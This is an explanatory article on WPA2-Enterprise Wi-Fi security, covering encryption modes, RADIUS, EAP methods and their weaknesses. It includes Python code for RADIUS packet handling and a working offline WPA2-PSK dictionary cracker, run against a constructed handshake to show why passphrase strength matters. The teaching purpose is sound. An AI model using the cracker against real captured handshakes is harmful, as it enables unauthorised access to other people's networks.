WPA2-Enterprise, or the right approach to Wi-Fi network security

Recently there have been many “revealing” publications about hacking yet another protocol or technology, supposedly compromising the security of wireless networks. Is this really so, what should you be afraid of, and how can access to your network be made as secure as possible? Do WEP, WPA, 802.1X, EAP and PKI mean little to you? This short review brings together the encryption and authorization technologies applicable to radio access. I will try to show that a properly configured wireless network is an insurmountable barrier for an attacker (up to a certain limit, of course).



The basics


Any interaction between the access point (network) and the wireless client is built on:

  • Authentication - the client and the access point introduce themselves to each other and confirm that they are entitled to communicate;
  • Encryption - which algorithm scrambles the transmitted data, how the encryption key is generated, and when it changes.


The parameters of a wireless network, above all its name (SSID), are announced regularly by the access point in broadcast beacon frames. Besides the expected security settings, the beacon carries QoS information, 802.11n parameters, supported rates, information about neighbouring access points, and more. Authentication determines how the client presents itself to the access point. The options are:

  • Open - the so-called open network, in which every connecting device is authenticated immediately
  • Shared - the connecting device must prove itself with a key / password
  • EAP - the connecting device must be verified via EAP by an external server

An open network does not mean that anyone can use it with impunity. To transmit data in it, the encryption algorithm used must match on both sides and, accordingly, the encrypted connection must be established correctly. The encryption algorithms are:

  • None - no encryption, data is transmitted in the clear
  • WEP - an RC4-based cipher with static or dynamic keys of different lengths (64 or 128 bits)
  • CKIP - Cisco's proprietary WEP replacement, an early version of TKIP
  • TKIP - an enhanced WEP replacement (still RC4, but with per-packet key mixing and an integrity check)
  • AES / CCMP - the most advanced option: AES with a 128-bit key in CCM mode, which both encrypts and authenticates every frame


The combination of Open Authentication and No Encryption is widely used for guest access, such as Internet in a cafe or hotel. To connect you need only the name of the wireless network. Often such a connection is combined with an additional check on a Captive Portal: the user's first HTTP request is redirected to a page that asks for confirmation (login and password, acceptance of the terms, and so on).

WEP is broken and must not be used (even with dynamic keys).

The commonly used terms WPA and WPA2 in fact denote the encryption algorithm (TKIP or AES-CCMP respectively). Since client adapters have supported WPA2 (AES) for quite some time, there is no reason to use TKIP.

The difference between WPA2 Personal and WPA2 Enterprise lies in where the keys fed into AES come from. For private (home, small office) use, a static passphrase (codeword, PSK, Pre-Shared Key) of 8 to 63 characters is set in the access point and is the same for every client of the wireless network; the passphrase and the SSID yield a master key (PMK) that is identical on every client, and the per-session keys are derived from it when the client associates. Compromise of such a key (a neighbour talked, an employee was dismissed, a laptop was stolen) requires an immediate passphrase change for all remaining users, which is realistic only when there are few of them. For corporate use, as the name implies, a dynamic key is used, individual to each client currently at work. It can be renewed periodically during operation without breaking the connection, and an additional component is responsible for producing it: the authorization server, which is almost always a RADIUS server.

All the security parameters are summarized in the following table:

Property                | Static WEP                         | Dynamic WEP                              | WPA                                 | WPA2 (Enterprise)
------------------------|------------------------------------|------------------------------------------|-------------------------------------|--------------------------------------------------
Identification          | User, computer, WLAN card          | User, computer                           | User, computer                      | User, computer
Authentication          | Shared key                         | EAP                                      | EAP or shared key                   | EAP or shared key
Integrity               | 32-bit Integrity Check Value (ICV) | 32-bit ICV                               | 64-bit Message Integrity Code (MIC) | CCM (Counter mode with CBC-MAC), part of AES-CCMP
Encryption              | Static key                         | Session key                              | Per-packet key via TKIP             | CCMP (AES)
Key distribution        | Single, manual                     | Segment of the Pairwise Master Key (PMK) | Derived from PMK                    | Derived from PMK
Initialization vector   | Plaintext, 24 bits                 | Plaintext, 24 bits                       | Extended IV, 65 bits                | 48-bit packet number (PN)
Algorithm               | RC4                                | RC4                                      | RC4                                 | AES
Key length, bits        | 64/128                             | 64/128                                   | 128                                 | 128 (AES-CCMP; the AES cipher itself allows up to 256)
Required infrastructure | None                               | RADIUS                                   | RADIUS                              | RADIUS


WPA2 Personal (WPA2-PSK) needs no further explanation; the enterprise variant deserves a closer look.

WPA2 Enterprise



Here we are dealing with an additional set of protocols. On the client side a special software component, the supplicant (usually part of the OS), talks to the authorizing party, the AAA server. What follows describes a unified wireless network built on lightweight access points and a controller; with autonomous ("fat") access points the whole intermediary role between clients and the server is taken over by the access point itself. Over the air the supplicant's data travels in 802.1X frames (EAPOL); on the controller side it is wrapped into RADIUS packets.

Applying the EAP authorization mechanism on your network means that after the client is authenticated by the access point (together with the controller, if any), almost certainly with Open authentication, the latter asks the client to authorize itself, that is, to confirm its credentials against the infrastructure's RADIUS server.
Using WPA2 Enterprise therefore requires a RADIUS server on your network. At present the most widely used products are:
  • Microsoft Network Policy Server (NPS), the former IAS - is configured via MMC, is free, but you need to buy Windows
  • Cisco Secure Access Control Server (ACS) 4.2, 5.3 - configurable via a web interface, sophisticated in functionality, allows you to create distributed and fault-tolerant systems, is expensive
  • FreeRADIUS - free, configurable by text configs, not convenient to manage and monitor


Meanwhile the controller watches the exchange closely and waits for the authorization to succeed or be refused. On success the RADIUS server can hand the access point additional parameters (which VLAN to place the subscriber in, an IP address, a QoS profile, and so on). By the end of the exchange the EAP method has produced a master key on both the supplicant and the RADIUS server; the server delivers it to the controller inside the Access-Accept, and from it the client and the access point derive and confirm encryption keys that are individual and valid only for this session.
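To make the encapsulation concrete, here is an added example (mine, not the article's and not any vendor's implementation) of the RADIUS side of the exchange in Python: the controller wraps an EAP packet into an Access-Request carrying EAP-Message and Message-Authenticator attributes, and the server answers with an Access-Accept that assigns a VLAN through the Tunnel-* attributes. The shared secret, packet identifier, user name, NAS address and VLAN number are constructed; the delivery of the PMK (MS-MPPE-Recv-Key) is noted in a comment but not implemented.

```python
"""RADIUS as the carrier for EAP between the controller and the AAA server.

Added example (not from the original article): the shared secret, packet
identifier, EAP payload and VLAN number are constructed; the attribute
encodings follow RFC 2865/2868/2869/3579.
"""
import hashlib
import hmac
import os

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_NAS_IP, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTH = 1, 4, 79, 80
ATTR_TUNNEL_TYPE, ATTR_TUNNEL_MEDIUM, ATTR_TUNNEL_PRIV_GROUP = 64, 65, 81


def tlv(attr_type: int, value: bytes) -> bytes:
    # Attribute = Type(1) | Length(1, includes these two bytes) | Value (<= 253 bytes)
    if len(value) > 253:
        raise ValueError("attribute value too long; split it (see encapsulate_eap)")
    return bytes([attr_type, len(value) + 2]) + value


def parse_attrs(packet: bytes):
    attrs, pos = [], 20
    while pos < len(packet):
        t, length = packet[pos], packet[pos + 1]
        if length < 2 or pos + length > len(packet):
            raise ValueError("malformed attribute")
        attrs.append((t, packet[pos + 2:pos + length]))
        pos += length
    return attrs


def seal(code: int, ident: int, field_auth: bytes, hmac_auth: bytes, attrs, secret: bytes) -> bytes:
    # Append Message-Authenticator (RFC 2869 5.14): HMAC-MD5 keyed with the shared secret
    # over the whole packet with that attribute's value zeroed. Mandatory whenever
    # EAP-Message is present (RFC 3579 3.2): the Request Authenticator alone is random
    # and proves nothing about who sent the EAP payload.
    body = b"".join(attrs) + tlv(ATTR_MESSAGE_AUTH, bytes(16))
    header = bytes([code, ident]) + (20 + len(body)).to_bytes(2, "big")
    ma = hmac.new(secret, header + hmac_auth + body, hashlib.md5).digest()
    return header + field_auth + body[:-16] + ma


def check_message_authenticator(packet: bytes, secret: bytes, hmac_auth: bytes) -> bool:
    pos = 20
    while pos < len(packet):
        t, length = packet[pos], packet[pos + 1]
        if t == ATTR_MESSAGE_AUTH and length == 18:
            zeroed = packet[:4] + hmac_auth + packet[20:pos + 2] + bytes(16) + packet[pos + 18:]
            expected = hmac.new(secret, zeroed, hashlib.md5).digest()
            return hmac.compare_digest(expected, packet[pos + 2:pos + 18])
        pos += max(length, 2)
    return False  # absent: a packet carrying EAP-Message must then be discarded


def encapsulate_eap(eap_packet: bytes, ident: int, user: str, nas_ip: str, secret: bytes):
    # Controller -> RADIUS: the EAP packet received in EAPOL goes into EAP-Message
    # attributes, chunked at 253 bytes (EAP-TLS certificate fragments need this).
    attrs = [tlv(ATTR_USER_NAME, user.encode()),
             tlv(ATTR_NAS_IP, bytes(int(o) for o in nas_ip.split(".")))]
    attrs += [tlv(ATTR_EAP_MESSAGE, eap_packet[i:i + 253]) for i in range(0, len(eap_packet), 253)]
    request_auth = os.urandom(16)
    return seal(ACCESS_REQUEST, ident, request_auth, request_auth, attrs, secret), request_auth


def verify_request(packet: bytes, secret: bytes) -> bool:
    return check_message_authenticator(packet, secret, packet[4:20])


def access_accept_with_vlan(ident: int, request_auth: bytes, secret: bytes, vlan_id: int) -> bytes:
    # RADIUS -> controller on success. Tunnel-* attributes (RFC 2868) place the client in a
    # VLAN. A real Access-Accept also carries the PMK in MS-MPPE-Recv-Key (vendor-specific,
    # obfuscated with the shared secret), which is why that secret must be strong; omitted here.
    tag = b"\x01"
    attrs = [tlv(ATTR_TUNNEL_TYPE, tag + (13).to_bytes(3, "big")),     # 13 = VLAN
             tlv(ATTR_TUNNEL_MEDIUM, tag + (6).to_bytes(3, "big")),    # 6 = IEEE-802
             tlv(ATTR_TUNNEL_PRIV_GROUP, tag + str(vlan_id).encode())]
    # A response's Message-Authenticator is keyed over the Request Authenticator...
    pkt = seal(ACCESS_ACCEPT, ident, request_auth, request_auth, attrs, secret)
    # ...then the Response Authenticator = MD5(Code|ID|Length|RequestAuth|Attributes|Secret)
    resp_auth = hashlib.md5(pkt[:4] + request_auth + pkt[20:] + secret).digest()
    return pkt[:4] + resp_auth + pkt[20:]


def verify_response(packet: bytes, request_auth: bytes, secret: bytes) -> bool:
    # The NAS binds the response to its own outstanding request; a forged or replayed
    # Access-Accept that does not match that Request Authenticator fails both checks.
    expected = hashlib.md5(packet[:4] + request_auth + packet[20:] + secret).digest()
    if not hmac.compare_digest(expected, packet[4:20]):
        return False
    return check_message_authenticator(packet, secret, request_auth)


def vlan_from_accept(packet: bytes):
    for t, value in parse_attrs(packet):
        if t == ATTR_TUNNEL_PRIV_GROUP:
            return int(value[1:])  # skip the tag byte
    return None
```

The two verify functions make the practical point: the RADIUS shared secret is what authenticates both directions of this exchange, so a weak secret, or a controller that accepts EAP-Message without Message-Authenticator, undoes whatever the EAP method inside achieves.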



EAP


EAP itself is only a container: the actual authorization mechanism is left to the inner methods. At the moment the following have seen any significant use:
  • EAP-FAST (Flexible Authentication via Secure Tunneling), developed by Cisco; allows login/password authorization inside a TLS tunnel between the supplicant and the RADIUS server
  • EAP-TLS (Transport Layer Security) uses a public key infrastructure (PKI) to authorize client and server (supplicant and RADIUS server) through certificates issued by a trusted certification authority (CA). It requires issuing and installing a client certificate on every wireless device, so it is suitable only for a managed corporate environment. A Windows certificate server has tools that let a client generate its own certificate if it is a domain member. Blocking a client is as simple as revoking its certificate (or disabling the account).
  • EAP-TTLS (Tunneled Transport Layer Security) is similar to EAP-TLS, but no client certificate is needed to build the tunnel. Inside that tunnel, which resembles a browser's SSL connection, an additional authorization is performed (by password or otherwise).
  • PEAP-MSCHAPv2 (Protected EAP) is similar to EAP-TTLS in that it first establishes an encrypted TLS tunnel between client and server, which requires a server certificate; authorization using the well-known MSCHAPv2 protocol then takes place inside that tunnel.
  • PEAP-GTC (Generic Token Card) is similar to the previous one but requires one-time-password tokens (and the corresponding infrastructure)


All these methods (except EAP-FAST) require a server certificate on the RADIUS server, issued by a certification authority (CA), and the CA certificate must be present in the trusted store of the client device (easy to arrange with Group Policy in Windows). EAP-TLS additionally requires an individual client certificate. The client is authenticated by digital signature and, optionally, by comparing the certificate it presents to the RADIUS server with the copy the server pulls from the PKI infrastructure (Active Directory).

Support for a given EAP method must be provided by the client-side supplicant. The standard built-in supplicants of Windows XP / Vista / 7, iOS and Android provide at least EAP-TLS and PEAP with EAP-MSCHAPv2, which makes these methods popular. With Intel client adapters on Windows, Intel PROSet extends the available list; the Cisco AnyConnect client does the same.





How reliable is it?


After all, what does an attacker need to break into your network?

With Open Authentication and No Encryption, nothing: connect to the network and that is it. Since the radio medium is open and the signal propagates in every direction, shielding it is not easy. With a client adapter that can listen to the air, all network traffic is visible exactly as if the attacker had plugged into the wire, a hub, or the SPAN port of a switch.
WEP only needs enough captured traffic (IVs) and one of the many freely available utilities.
For encryption based on TKIP or AES, direct decryption is possible in theory but in practice has not been carried out (TKIP does have published attacks that recover the MIC key and let an attacker inject or decrypt a few small frames, one more reason to prefer CCMP; no practical attack on CCMP itself is known).

Of course, you can try to guess the PSK, or a password for one of the EAP methods. For WPA2-PSK this is an offline dictionary attack against a captured four-way handshake (the attacker needs no further contact with the network once it is recorded), so it succeeds or fails purely on the strength of the passphrase; no general attacks on the EAP methods themselves are known. Beyond that there remain social engineering and rubber-hose cryptanalysis.
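As an added illustration of the PSK remark above and of where the WPA2 Personal keys come from (the "static key" discussed earlier), the following Python is my example, not code from the article: it derives the PMK from the passphrase and SSID, derives the per-session PTK the way the four-way handshake does, and runs a wordlist over a constructed EAPOL-Key message 2 exactly as an offline attacker would. The SSID, MAC addresses, nonces, handshake frame and wordlist are all constructed here; the PBKDF2 parameters and the PRF are the 802.11i ones.

```python
"""WPA2-Personal key derivation and the offline dictionary attack it permits.

Added example (not from the original article). The SSID, MAC addresses, nonces
and the EAPOL-Key frame below are constructed here so everything runs offline.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL-Key MIC: 4-byte 802.1X header + 77 bytes of fixed fields


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # Every station on a WPA2-PSK network ends up with this same PMK.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: concatenate HMAC-SHA1(K, A || 0x00 || B || i) for i = 0..3
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Pairwise Transient Key; the KCK used for the handshake MIC is its first 16 bytes.
    # Both MAC addresses and both nonces cross the air in clear during the handshake.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC zeroed, truncated
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    # Constructed EAPOL-Key message 2 of 4 (supplicant -> AP): the frame an attacker
    # sniffs. It carries SNonce in clear and a MIC keyed with the KCK.
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: pairwise, MIC present, HMAC-SHA1 (version 2)
        + b"\x00\x00"              # key length
        + (1).to_bytes(8, "big")   # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
        + bytes(16)                # MIC placeholder
        + b"\x00\x16"              # key data length (22)
        + bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK
    )
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    # Fully offline: nothing is sent to the AP. Each candidate costs one PBKDF2 run
    # (4096 HMACs) plus one PRF; passphrase entropy is the only thing bounding the attacker.
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed fixture: an office WLAN whose passphrase happens to be in a small wordlist.
SSID = "corp-guest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["12345678", "password", "letmein1", "Summer2012", "qwerty123"]


def captured_msg2(passphrase: str = "Summer2012") -> bytes:
    # Stand-in for a sniffed handshake: message 2 as a legitimate client would send it.
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, kck)


if __name__ == "__main__":
    print(crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, captured_msg2(), WORDLIST))
```

Nothing in the loop talks to the access point, and the only cost per guess is one PBKDF2 run, which is why the passphrase length and randomness, not the AES key size, decide the security of WPA2 Personal. With WPA2 Enterprise the PMK comes out of the EAP exchange, so there is no shared secret to guess this way.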

A network protected by EAP-FAST, EAP-TTLS or PEAP-MSCHAPv2 can only be entered by knowing the user's login and password (there is no hacking as such). Attacks such as password cracking, or those aimed at weaknesses in MSCHAP, are not possible or are difficult because the client-server EAP channel is protected by an encrypted tunnel. That protection holds only as long as the supplicant actually validates the server certificate (trusted CA and expected server name): a supplicant configured to skip that check will happily build its tunnel to an attacker's access point and RADIUS server and hand over the MSCHAPv2 exchange, so enforce certificate validation in the client profile rather than leaving it to the user.

A network protected by PEAP-GTC can be entered either when the token server is compromised or when a token is stolen together with its password.

A network protected by EAP-TLS can be entered when a user certificate is stolen (together with its private key, of course), or when a valid but fraudulent certificate is issued. The latter is possible only if the certification authority is compromised, which in any normal company is guarded as the most valuable IT resource.

Since all of the above methods (except PEAP-GTC) allow passwords / certificates to be stored (cached), an attacker who steals a mobile device gains full network access without being asked anything. Full disk encryption with a password prompt at power-on serves as the preventive measure, and when a device does go missing, revoke its certificate or reset the account password at once.

Remember: with proper design a wireless network can be protected very well; there is no known means of hacking such a network (up to a known limit).